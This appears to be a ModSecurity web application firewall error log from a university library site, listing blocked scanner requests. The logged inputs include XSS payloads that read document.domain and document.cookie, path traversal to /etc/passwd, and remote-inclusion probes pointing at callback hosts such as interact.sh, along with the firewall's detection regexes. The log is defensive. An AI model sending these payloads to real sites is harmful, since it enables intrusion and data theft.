[Tue Aug 29 11:53:52.895822 2023] [:error] [pid 2608] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:callback. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:callback: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/client/manage/ourphp_tz.php"] [unique_id "ZO154MCo-f0AAAowNtQAAAAH"]
[Tue Aug 29 11:53:53.541159 2023] [:error] [pid 2640] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilib.unla.ac.id"] [uri "/api.php"] [unique_id "ZO154cCo-f0AAApQ2VEAAAAb"]
[Tue Aug 29 11:53:54.547938 2023] [:error] [pid 2575] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh/ found within TX:1: interact.sh/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilib.unla.ac.id"] [uri "/webadmin/authportal/bounce.php"] [unique_id "ZO154sCo-f0AAAoPufMAAAAM"]
[Tue Aug 29 11:53:55.557293 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:mod. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:mod: list</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/cms/info.php"] [unique_id "ZO1548Co-f0AAAoW7WIAAAAJ"]
[Tue Aug 29 11:53:55.590909 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:text. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:text: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/new-year-firework/firework/index.php"] [unique_id "ZO1548Co-f0AAAoLfXoAAAAG"]
[Tue Aug 29 11:53:56.555408 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:!'><sVg/OnLoAD. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: < found within ARGS_NAMES:!'><sVg/OnLoAD: !'><sVg/OnLoAD"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilib.unla.ac.id"] [uri "/Login"] [unique_id "ZO155MCo-f0AAAoW7WcAAAAJ"]
[Tue Aug 29 11:53:56.636603 2023] [:error] [pid 2591] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:error_description. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:error_description: <svg/onload=alert(1)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/userpro/lib/instagram/vendor/cosenary/instagram/example/success.php"] [unique_id "ZO155MCo-f0AAAofm-sAAAAX"]
[Tue Aug 29 11:54:00.555854 2023] [:error] [pid 2566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:woof_redraw_elements[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:woof_redraw_elements[]: <img src=x onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilib.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO156MCo-f0AAAoGFhYAAAAE"]
[Tue Aug 29 11:54:00.609523 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:i. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:i: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/flash-album-gallery/facebook.php"] [unique_id "ZO156MCo-f0AAApHRX8AAAAP"]
[Tue Aug 29 11:54:00.719160 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://oast.me found within TX:1: oast.me"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilib.unla.ac.id"] [uri "/inc/supportLoad.asp"] [unique_id "ZO156MCo-f0AAAn40-wAAAAW"]
[Tue Aug 29 11:54:00.745608 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:prodID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x22>< found within ARGS:prodID: '\\x22><svg/onload=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/PolicyMgmt/policyDetailsCard.do"] [unique_id "ZO156MCo-f0AAAoAk3kAAAAC"]
[Tue Aug 29 11:54:01.686733 2023] [:error] [pid 2635] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:TF_submask. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:TF_submask: \\x22><script>alert(2Ue0HYDRcj1tkgDi2D2Z3jM8qWy)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/if.cgi"] [unique_id "ZO156cCo-f0AAApLWmEAAAAI"]
[Tue Aug 29 11:54:02.681969 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://oast.me found within TX:1: oast.me"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilib.unla.ac.id"] [uri "/vsaPres/Web20/core/LocalProxy.ashx"] [unique_id "ZO156sCo-f0AAAn41AcAAAAW"]
[Tue Aug 29 11:54:04.850072 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilib.unla.ac.id"] [uri "/loginsave.php"] [unique_id "ZO157MCo-f0AAAolKdgAAAAe"]
[Tue Aug 29 11:54:04.852030 2023] [:error] [pid 2609] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:success. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:success: </script><script>alert(document.cookie);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO157MCo-f0AAAox7N4AAAAN"]
[Tue Aug 29 11:54:08.175464 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:logFile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ....//....//....//....// found within ARGS:logFile: ....//....//....//....//etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/opm/read_sessionlog.php"] [unique_id "ZO158MCo-f0AAApbUQMAAAAh"]
[Tue Aug 29 11:54:08.540272 2023] [:error] [pid 2640] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:size. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:size: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/admin-font-editor/css.php"] [unique_id "ZO158MCo-f0AAApQ2YgAAAAb"]
[Tue Aug 29 11:54:10.040425 2023] [:error] [pid 2646] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:theme. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:theme: tes\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/contact.php"] [unique_id "ZO158sCo-f0AAApWY0kAAAAM"]
[Tue Aug 29 11:54:10.959707 2023] [:error] [pid 2648] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://www.interact.sh found within TX:1: www.interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO158sCo-f0AAApYpmwAAAAa"]
[Tue Aug 29 11:54:11.173263 2023] [:error] [pid 2657] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:windowTitle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ><!-- found within ARGS:windowTitle: AdministratorHelpWindow></TITLE></HEAD><body><script>alert(1337)</script><!--"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp"] [unique_id "ZO1588Co-f0AAAph8swAAAAj"]
[Tue Aug 29 11:54:12.596569 2023] [:error] [pid 2657] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb08b8iyzchsrdko.oast.site found within TX:1: cjmnijtjmimvgniikdb08b8iyzchsrdko.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilib.unla.ac.id"] [uri "/"] [unique_id "ZO159MCo-f0AAAph8tkAAAAj"]
[Tue Aug 29 11:54:14.112378 2023] [:error] [pid 2649] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22/></ found within ARGS:s: \\x22/></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/"] [unique_id "ZO159sCo-f0AAApZHTIAAAAf"]
[Tue Aug 29 11:54:14.171370 2023] [:error] [pid 2657] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/stageshow/stageshow_redirect.php"] [unique_id "ZO159sCo-f0AAAph8t8AAAAj"]
[Tue Aug 29 11:54:14.604589 2023] [:error] [pid 2640] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:TargetService. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:TargetService: /knowage/servlet/AdapterHTTP?Page=LoginPage</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/knowage/servlet/AdapterHTTP"] [unique_id "ZO159sCo-f0AAApQ2ZUAAAAb"]
[Tue Aug 29 11:54:14.687486 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:keyword. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:keyword: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/pdf-generator-for-wp/package/lib/dompdf/vendor/dompdf/dompdf/I18N/Arabic/Examples/Query.php"] [unique_id "ZO159sCo-f0AAAolKgIAAAAe"]
[Tue Aug 29 11:54:15.639643 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:id: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/comm.php"] [unique_id "ZO1598Co-f0AAAolKgcAAAAe"]
[Tue Aug 29 11:54:16.695480 2023] [:error] [pid 2649] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:var_filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:var_filename: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/viewrq.php"] [unique_id "ZO15@MCo-f0AAApZHTsAAAAf"]
[Tue Aug 29 11:54:16.787267 2023] [:error] [pid 2585] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:prefix. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:prefix: \\x22><script>alert(document.domain);</script><"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/magmi/web/ajax_gettime.php"] [unique_id "ZO15@MCo-f0AAAoZ6bAAAAAK"]
[Tue Aug 29 11:54:20.946505 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:first. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:first: HOVER ME!</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/plugins/address_add/add.php"] [unique_id "ZO15-MCo-f0AAApXgcMAAAAU"]
[Tue Aug 29 11:54:20.971716 2023] [:error] [pid 2649] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:background. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:background: \\x22><script>alert(document.domain)</script><img src=\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/squid.svg"] [unique_id "ZO15-MCo-f0AAApZHUcAAAAf"]
[Tue Aug 29 11:54:21.551256 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:wpbase. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:wpbase: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname 